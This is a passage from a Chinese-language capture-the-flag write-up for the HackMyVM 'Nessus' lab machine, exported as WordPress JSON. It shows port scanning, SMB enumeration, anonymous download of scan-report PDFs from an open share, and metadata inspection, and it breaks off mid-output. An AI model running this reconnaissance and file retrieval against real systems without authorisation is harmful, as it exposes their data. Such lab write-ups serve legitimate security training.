{"id":845,"date":"2025-06-10T00:11:43","date_gmt":"2025-06-09T16:11:43","guid":{"rendered":"http:\/\/162.14.82.114\/?p=845"},"modified":"2025-06-10T00:11:43","modified_gmt":"2025-06-09T16:11:43","slug":"hmv-_-nessus","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/845\/06\/10\/2025\/","title":{"rendered":"hmv[-_-]Nessus"},"content":{"rendered":"<h1>Nessus<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506100011590.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506100011590.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250609150030709\" \/><\/div><\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506100011592.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506100011592.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250609150917586\" style=\"zoom:50%;\" 
\/><\/div><\/p>\n<h2>\u4fe1\u606f\u641c\u96c6<\/h2>\n<h3>\u7aef\u53e3\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Nessus]\n\u2514\u2500$ rustscan -a $IP -- -sCV\n.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-&#039; `-&#039;`-----&#039;`----&#039;  `-&#039;  `----&#039;  `---&#039; `-&#039;  `-&#039;`-&#039; `-&#039;\nThe Modern Day Port Scanner.\n________________________________________\n: http:\/\/discord.skerritt.blog         :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nPlease contribute more quotes to our GitHub https:\/\/github.com\/rustscan\/rustscan\n\n[~] The config file is expected to be at &quot;\/home\/kali\/.rustscan.toml&quot;\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan&#039;s speed. Use the Docker image, or up the Ulimit with &#039;--ulimit 5000&#039;. \nOpen 192.168.10.100:139\nOpen 192.168.10.100:445\nOpen 192.168.10.100:135\nOpen 192.168.10.100:5985\nOpen 192.168.10.100:8834\nOpen 192.168.10.100:47001\nOpen 192.168.10.100:49664\nOpen 192.168.10.100:49665\nOpen 192.168.10.100:49666\nOpen 192.168.10.100:49667\nOpen 192.168.10.100:49668\nOpen 192.168.10.100:49669\n\nPORT      STATE SERVICE            REASON          VERSION\n135\/tcp   open  msrpc              syn-ack ttl 128 Microsoft Windows RPC\n139\/tcp   open  netbios-ssn        syn-ack ttl 128 Microsoft Windows netbios-ssn\n445\/tcp   open  microsoft-ds?      syn-ack ttl 128\n5985\/tcp  open  http               syn-ack ttl 128 Microsoft HTTPAPI httpd 2.0 (SSDP\/UPnP)\n|_http-server-header: Microsoft-HTTPAPI\/2.0\n|_http-title: Not Found\n8834\/tcp  open  ssl\/nessus-xmlrpc? 
syn-ack ttl 128\n|_ssl-date: TLS randomness does not represent time\n| ssl-cert: Subject: commonName=WIN-C05BOCC7F0H\/organizationName=Nessus Users United\/stateOrProvinceName=NY\/countryName=US\/localityName=New York\/organizationalUnitName=Nessus Server\n| Issuer: commonName=Nessus Certification Authority\/organizationName=Nessus Users United\/stateOrProvinceName=NY\/countryName=US\/localityName=New York\/organizationalUnitName=Nessus Certification Authority\n| Public Key type: rsa\n| Public Key bits: 2048\n| Signature Algorithm: sha256WithRSAEncryption\n| Not valid before: 2024-10-18T17:36:17\n| Not valid after:  2028-10-17T17:36:17\n| MD5:   d62f:ddbd:0931:a519:cc87:4c9a:f7bf:6ff7\n| SHA-1: 6bf2:207b:dc38:8181:aee2:03dc:0d3d:fa70:dd77:3af6\n| -----BEGIN CERTIFICATE-----\n| MIIEEjCCAvqgAwIBAgIDAJV2MA0GCSqGSIb3DQEBCwUAMIGdMRwwGgYDVQQKDBNO\n| ZXNzdXMgVXNlcnMgVW5pdGVkMScwJQYDVQQLDB5OZXNzdXMgQ2VydGlmaWNhdGlv\n| biBBdXRob3JpdHkxETAPBgNVBAcMCE5ldyBZb3JrMQswCQYDVQQGEwJVUzELMAkG\n| A1UECAwCTlkxJzAlBgNVBAMMHk5lc3N1cyBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0\n| eTAeFw0yNDEwMTgxNzM2MTdaFw0yODEwMTcxNzM2MTdaMH0xHDAaBgNVBAoME05l\n| c3N1cyBVc2VycyBVbml0ZWQxFjAUBgNVBAsMDU5lc3N1cyBTZXJ2ZXIxETAPBgNV\n| BAcMCE5ldyBZb3JrMQswCQYDVQQGEwJVUzELMAkGA1UECAwCTlkxGDAWBgNVBAMM\n| D1dJTi1DMDVCT0NDN0YwSDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEB\n| ANYkmLB3EVCbKrHOOzIfW5n\/7WZBDBmW2lyg0kz185b10UyNDwiY5AgRwfC2WnaC\n| oThJ0QVlVb22s6c1XbaWvyITj1K5xKe1D2uIJHl10EqBcfPq2BefeaXtVoh4jqZu\n| VfafEpBwFSPC7dAnO4ZMghKBpWfogM3fYmavNdFptNASZqvTN7hskFETb4ARd397\n| WC+fXe+AG4MYgrLyJuZCa+qnI4adkADCCTTtU644Pl8OloVnnK8L5S3wNsEzDXQi\n| fvDyZKfo2WMh6BjgjN+X+Cxk4GtFsfX7QCiBr9nKakalE0Mq8nPO4Tm30Tm3GFN6\n| looCoH+ZYXAfnUfd8KvHDE8CAwEAAaN6MHgwEQYJYIZIAYb4QgEBBAQDAgZAMA4G\n| A1UdDwEB\/wQEAwIF4DAdBgNVHQ4EFgQU5ZEiC8RiIg\/FclNLopO\/rxRBC80wHwYD\n| VR0jBBgwFoAULRfLGNDUNuA90xpNsUsFyRiuDyQwEwYDVR0lBAwwCgYIKwYBBQUH\n| AwEwDQYJKoZIhvcNAQELBQADggEBAAToblD5fSPM3tyk14\/IK0cnDiHSuXFGxXhY\n| 
il7tC177Tb+dNN9vRW58pA4tR+8eDeKUfM+MX6LpJPka4seGbeFjVDppwthlAf44\n| ih37bwqAT7Kzznx59VMCjgyDqwe\/qprQ9z4OOrD0wnkx4KycTLHmnjCj\/rhyUN9+\n| WYHPmdwjEiBs2kLGBIVX30+jiwwgd8+nsamEYTVIEB0FCtts3On13KGyS8gpypAr\n| e7rQDFdkG+O\/M9LKBF+xdcc4SCfEGXdKZnv1V8GVElsYxQ+BxpLjzrI\/XLSvqqRm\n| 9i8HnGnU8AOEa0rzzdUhzWMjpCj4aG861UAOoOQso5RbHLqNTgU=\n|_-----END CERTIFICATE-----\n| fingerprint-strings: \n|   GetRequest: \n|     HTTP\/1.1 200 OK\n|     Cache-Control: must-revalidate\n|     X-Frame-Options: DENY\n|     Content-Type: text\/html\n|     ETag: d9565642fa203e8195c69acb664f1a88\n|     Connection: close\n|     X-XSS-Protection: 1; mode=block\n|     Server: NessusWWW\n|     Date: Mon, 09 Jun 2025 07:10:42 GMT\n|     X-Content-Type-Options: nosniff\n|     Content-Length: 1217\n|     Content-Security-Policy: upgrade-insecure-requests; block-all-mixed-content; form-action &#039;self&#039;; frame-ancestors &#039;none&#039;; frame-src https:\/\/store.tenable.com; default-src &#039;self&#039;; connect-src &#039;self&#039; www.tenable.com; script-src &#039;self&#039; www.tenable.com; img-src &#039;self&#039; data:; style-src &#039;self&#039; www.tenable.com; object-src &#039;none&#039;; base-uri &#039;self&#039;;\n|     Strict-Transport-Security: max-age=31536000\n|     Expect-CT: max-age=0\n|     &lt;!doctype html&gt;\n|     &lt;html lang=&quot;en&quot;&gt;\n|     &lt;head&gt;\n|     &lt;meta http-equiv=&quot;X-UA-Compatible&quot; content=&quot;IE=edge,chrome=1&quot; \/&gt;\n|_    &lt;meta http-equiv=&quot;Content-Security-Policy&quot; content=&quot;upgrade-inse\n47001\/tcp open  http               syn-ack ttl 128 Microsoft HTTPAPI httpd 2.0 (SSDP\/UPnP)\n|_http-server-header: Microsoft-HTTPAPI\/2.0\n|_http-title: Not Found\n49664\/tcp open  msrpc              syn-ack ttl 128 Microsoft Windows RPC\n49665\/tcp open  msrpc              syn-ack ttl 128 Microsoft Windows RPC\n49666\/tcp open  msrpc              syn-ack ttl 128 Microsoft Windows RPC\n49667\/tcp open  msrpc              
syn-ack ttl 128 Microsoft Windows RPC\n49668\/tcp open  msrpc              syn-ack ttl 128 Microsoft Windows RPC\n49669\/tcp open  msrpc              syn-ack ttl 128 Microsoft Windows RPC\n1 service unrecognized despite returning data. If you know the service\/version, please submit the following fingerprint at https:\/\/nmap.org\/cgi-bin\/submit.cgi?new-service :\nSF-Port8834-TCP:V=7.95%T=SSL%I=7%D=6\/9%Time=684688EE%P=x86_64-pc-linux-gnu\nSF:%r(GetRequest,788,&quot;HTTP\/1\\.1\\x20200\\x20OK\\r\\nCache-Control:\\x20must-rev\nSF:alidate\\r\\nX-Frame-Options:\\x20DENY\\r\\nContent-Type:\\x20text\/html\\r\\nET\nSF:ag:\\x20d9565642fa203e8195c69acb664f1a88\\r\\nConnection:\\x20close\\r\\nX-XS\nSF:S-Protection:\\x201;\\x20mode=block\\r\\nServer:\\x20NessusWWW\\r\\nDate:\\x20M\nSF:on,\\x2009\\x20Jun\\x202025\\x2007:10:42\\x20GMT\\r\\nX-Content-Type-Options:\\\nSF:x20nosniff\\r\\nContent-Length:\\x201217\\r\\nContent-Security-Policy:\\x20up\nSF:grade-insecure-requests;\\x20block-all-mixed-content;\\x20form-action\\x20\nSF:&#039;self&#039;;\\x20frame-ancestors\\x20&#039;none&#039;;\\x20frame-src\\x20https:\/\/store\\.te\nSF:nable\\.com;\\x20default-src\\x20&#039;self&#039;;\\x20connect-src\\x20&#039;self&#039;\\x20www\\.\nSF:tenable\\.com;\\x20script-src\\x20&#039;self&#039;\\x20www\\.tenable\\.com;\\x20img-src\\\nSF:x20&#039;self&#039;\\x20data:;\\x20style-src\\x20&#039;self&#039;\\x20www\\.tenable\\.com;\\x20obj\nSF:ect-src\\x20&#039;none&#039;;\\x20base-uri\\x20&#039;self&#039;;\\r\\nStrict-Transport-Security:\nSF:\\x20max-age=31536000\\r\\nExpect-CT:\\x20max-age=0\\r\\n\\r\\n&lt;!doctype\\x20htm\nSF:l&gt;\\n&lt;html\\x20lang=\\&quot;en\\&quot;&gt;\\n\\x20\\x20\\x20\\x20&lt;head&gt;\\n\\x20\\x20\\x20\\x20\\x20\nSF:\\x20\\x20\\x20&lt;meta\\x20http-equiv=\\&quot;X-UA-Compatible\\&quot;\\x20content=\\&quot;IE=edg\nSF:e,chrome=1\\&quot;\\x20\/&gt;\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20&lt;meta\\x20http-equiv\nSF:=\\&quot;Content-Security-Policy\\&quot;\\x20content=\\&qu
ot;upgrade-inse&quot;);\nMAC Address: 08:00:27:D7:FF:F1 (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\nService Info: OS: Windows; CPE: cpe:\/o:microsoft:windows\n\nHost script results:\n|_clock-skew: 4s\n| p2p-conficker: \n|   Checking for Conficker.C or higher...\n|   Check 1 (port 55615\/tcp): CLEAN (Couldn&#039;t connect)\n|   Check 2 (port 55927\/tcp): CLEAN (Couldn&#039;t connect)\n|   Check 3 (port 63337\/udp): CLEAN (Timeout)\n|   Check 4 (port 17382\/udp): CLEAN (Failed to receive data)\n|_  0\/4 checks are positive: Host is CLEAN or ports are blocked\n| nbstat: NetBIOS name: NESSUS, NetBIOS user: &lt;unknown&gt;, NetBIOS MAC: 08:00:27:d7:ff:f1 (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\n| Names:\n|   WORKGROUP&lt;00&gt;        Flags: &lt;group&gt;&lt;active&gt;\n|   NESSUS&lt;00&gt;           Flags: &lt;unique&gt;&lt;active&gt;\n|   NESSUS&lt;20&gt;           Flags: &lt;unique&gt;&lt;active&gt;\n| Statistics:\n|   08:00:27:d7:ff:f1:00:00:00:00:00:00:00:00:00:00:00\n|   00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00\n|_  00:00:00:00:00:00:00:00:00:00:00:00:00:00\n| smb2-time: \n|   date: 2025-06-09T07:12:28\n|_  start_date: N\/A\n| smb2-security-mode: \n|   3:1:1: \n|_    Message signing enabled but not required<\/code><\/pre>\n<h2>\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n<h3>\u8e29\u70b9<\/h3>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506100011593.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506100011593.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250609152829505\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506100011594.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506100011594.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250609152913184\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>smb\u670d\u52a1\u63a2\u6d4b<\/h3>\n<p>\u53d1\u73b0\u5f00\u542f\u4e86 smb \u670d\u52a1\uff0c\u5c1d\u8bd5\u8fdb\u884c\u63a2\u6d4b\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Nessus]\n\u2514\u2500$ enum4linux -a $IP\nStarting enum4linux v0.9.1 ( http:\/\/labs.portcullis.co.uk\/application\/enum4linux\/ ) on Mon Jun  9 03:34:27 2025\n\n =========================================( Target Information )=========================================\n\nTarget ........... 192.168.10.100\nRID Range ........ 500-550,1000-1050\nUsername ......... &#039;&#039;\nPassword ......... &#039;&#039;\nKnown Usernames .. 
administrator, guest, krbtgt, domain admins, root, bin, none\n\n ===========================( Enumerating Workgroup\/Domain on 192.168.10.100 )===========================\n\n[+] Got domain\/workgroup name: WORKGROUP\n\n ===============================( Nbtstat Information for 192.168.10.100 )===============================\n\nLooking up status of 192.168.10.100\n        WORKGROUP       &lt;00&gt; - &lt;GROUP&gt; B &lt;ACTIVE&gt;  Domain\/Workgroup Name\n        NESSUS          &lt;00&gt; -         B &lt;ACTIVE&gt;  Workstation Service\n        NESSUS          &lt;20&gt; -         B &lt;ACTIVE&gt;  File Server Service\n\n        MAC Address = 08-00-27-D7-FF-F1\n\n ==================================( Session Check on 192.168.10.100 )==================================\n\n[E] Server doesn&#039;t allow session using username &#039;&#039;, password &#039;&#039;.  Aborting remainder of tests.<\/code><\/pre>\n<p>\u63a5\u7740\u67e5\u770b\u4e00\u4e0b\u76f8\u5173\u4fe1\u606f\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Nessus]\n\u2514\u2500$ smbclient -L $IP       \nPassword for [WORKGROUP\\kali]:\n\n        Sharename       Type      Comment\n        ---------       ----      -------\n        ADMIN$          Disk      Remote Admin\n        C$              Disk      Default share\n        Documents       Disk      \n        IPC$            IPC       Remote IPC\nReconnecting with SMB1 for workgroup listing.\ndo_connect: Connection to 192.168.10.100 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)\nUnable to connect with SMB1 -- no workgroup available<\/code><\/pre>\n<p>\u53d1\u73b0\u5b58\u5728\u4e00\u4e2a\u5171\u4eab\u6587\u4ef6\u5939\uff0c\u5c1d\u8bd5\u8fdb\u884c\u8bfb\u53d6\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Nessus]\n\u2514\u2500$ smbclient \/\/$IP\/Documents \nPassword for [WORKGROUP\\kali]:\nTry &quot;help&quot; to get a list of possible commands.\nsmb: \\&gt; dir\n  .    
                              DR        0  Fri Oct 18 20:42:53 2024\n  ..                                  D        0  Sat Oct 19 01:08:23 2024\n  desktop.ini                       AHS      402  Sat Jun 15 13:54:33 2024\n  My Basic Network Scan_hwhm7q.pdf      A   122006  Fri Oct 18 18:19:59 2024\n  My Music                        DHSrn        0  Sat Jun 15 13:54:27 2024\n  My Pictures                     DHSrn        0  Sat Jun 15 13:54:27 2024\n  My Videos                       DHSrn        0  Sat Jun 15 13:54:27 2024\n  Web Application Tests_f6jg9t.pdf      A   136025  Fri Oct 18 18:20:14 2024\n\n                12942591 blocks of size 4096. 10676065 blocks available\nsmb: \\&gt; <\/code><\/pre>\n<p>\u5c1d\u8bd5\u8fdb\u884c\u4e0b\u8f7d\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Nessus]\n\u2514\u2500$ smbclient \/\/$IP\/Documents\nPassword for [WORKGROUP\\kali]:\nTry &quot;help&quot; to get a list of possible commands.\nsmb: \\&gt; mget *\nGet file desktop.ini? y\ngetting file \\desktop.ini of size 402 as desktop.ini (15.7 KiloBytes\/sec) (average 15.7 KiloBytes\/sec)\nGet file My Basic Network Scan_hwhm7q.pdf? y\ngetting file \\My Basic Network Scan_hwhm7q.pdf of size 122006 as My Basic Network Scan_hwhm7q.pdf (1401.7 KiloBytes\/sec) (average 1086.7 KiloBytes\/sec)\nGet file Web Application Tests_f6jg9t.pdf? 
y\ngetting file \\Web Application Tests_f6jg9t.pdf of size 136025 as Web Application Tests_f6jg9t.pdf (2177.7 KiloBytes\/sec) (average 1475.9 KiloBytes\/sec)\nsmb: \\&gt; exit<\/code><\/pre>\n<p>\u770b\u4e00\u4e0b\u6709\u4e9b\u5565\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Nessus]\n\u2514\u2500$ cat desktop.ini \n\ufffd\ufffd\n[.ShellClassInfo]\nLocalizedResourceName=@%SystemRoot%\\system32\\shell32.dll,-21770\nIconResource=%SystemRoot%\\system32\\imageres.dll,-112\nIconFile=%SystemRoot%\\system32\\shell32.dll\nIconIndex=-235<\/code><\/pre>\n<p>\u53d1\u73b0\u5269\u4e0b\u7684\u662f\u4fe9\u626b\u63cf\u8bb0\u5f55\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506100011595.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506100011595.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250609155058715\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<p>\u8fd8\u6709\u4e00\u4efd\u7ec4\u4ef6\u6f0f\u6d1e\u6d4b\u8bd5\u7ed3\u679c\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506100011596.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" 
data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506100011596.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250609155154282\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506100011597.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506100011597.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250609155216551\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506100011598.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506100011598.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250609155227054\" style=\"zoom:50%;\" 
\/><\/div><\/p>\n<p>\u4f46\u662f\u53ef\u80fd\u7528\u4e0d\u4e86\uff0c\u56e0\u4e3a\u4f5c\u8005\u5728\u7b80\u4ecb\u91cc\u63d0\u5230\u4e86\u4e0d\u4f1a\u4f7f\u7528<code>CVE\u6f0f\u6d1e<\/code>\u3002<\/p>\n<blockquote>\n<p>Just exploit a well known application without a CVE. Hope you enjoy it.<\/p>\n<\/blockquote>\n<p>\u5c1d\u8bd5\u770b\u4e00\u4e0b\u8fd9\u4fe9<code>pdf<\/code>\u6587\u4ef6\u662f\u5426\u5b58\u5728\u9690\u85cf\u4fe1\u606f\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Nessus]\n\u2514\u2500$ exiftool *       \n======== desktop.ini\nExifTool Version Number         : 13.10\nFile Name                       : desktop.ini\nDirectory                       : .\nFile Size                       : 402 bytes\nFile Modification Date\/Time     : 2025:06:09 03:48:20-04:00\nFile Access Date\/Time           : 2025:06:09 03:48:46-04:00\nFile Inode Change Date\/Time     : 2025:06:09 03:48:20-04:00\nFile Permissions                : -rw-r--r--\nFile Type                       : TXT\nFile Type Extension             : txt\nMIME Type                       : text\/plain\nMIME Encoding                   : utf-16le\nByte Order Mark                 : Yes\nNewlines                        : Windows CRLF\n======== My Basic Network Scan_hwhm7q.pdf\nExifTool Version Number         : 13.10\nFile Name                       : My Basic Network Scan_hwhm7q.pdf\nDirectory                       : .\nFile Size                       : 122 kB\nFile Modification Date\/Time     : 2025:06:09 03:48:22-04:00\nFile Access Date\/Time           : 2025:06:09 03:48:22-04:00\nFile Inode Change Date\/Time     : 2025:06:09 03:48:22-04:00\nFile Permissions                : -rw-r--r--\nFile Type                       : PDF\nFile Type Extension             : pdf\nMIME Type                       : application\/pdf\nLinearized                      : No\nPage Count                      : 5\nProfile CMM Type                : Little CMS\nProfile Version                 : 
2.3.0\nProfile Class                   : Display Device Profile\nColor Space Data                : RGB\nProfile Connection Space        : XYZ\nProfile Date Time               : 2004:08:13 12:18:06\nProfile File Signature          : acsp\nPrimary Platform                : Microsoft Corporation\nCMM Flags                       : Not Embedded, Independent\nDevice Manufacturer             : Little CMS\nDevice Model                    : \nDevice Attributes               : Reflective, Glossy, Positive, Color\nRendering Intent                : Perceptual\nConnection Space Illuminant     : 0.9642 1 0.82491\nProfile Creator                 : Little CMS\nProfile ID                      : 7fb30d688bf82d32a0e748daf3dba95d\nDevice Mfg Desc                 : lcms generated\nProfile Description             : sRGB\nDevice Model Desc               : sRGB\nMedia White Point               : 0.95015 1 1.08826\nRed Matrix Column               : 0.43585 0.22238 0.01392\nBlue Matrix Column              : 0.14302 0.06059 0.71384\nGreen Matrix Column             : 0.38533 0.71704 0.09714\nRed Tone Reproduction Curve     : (Binary data 2060 bytes, use -b option to extract)\nGreen Tone Reproduction Curve   : (Binary data 2060 bytes, use -b option to extract)\nBlue Tone Reproduction Curve    : (Binary data 2060 bytes, use -b option to extract)\nChromaticity Channels           : 3\nChromaticity Colorant           : Unknown\nChromaticity Channel 1          : 0.64 0.33\nChromaticity Channel 2          : 0.3 0.60001\nChromaticity Channel 3          : 0.14999 0.06\nProfile Copyright               : no copyright, use freely\nXMP Toolkit                     : Image::ExifTool 12.76\nDate                            : 2024:10:18 15:10:05+02:00\nFormat                          : application\/pdf\nLanguage                        : x-unknown\nAuthor                          : Jose\nPDF Version                     : 1.4\nProducer                        : Apache FOP Version 2.8\nCreate Date                  
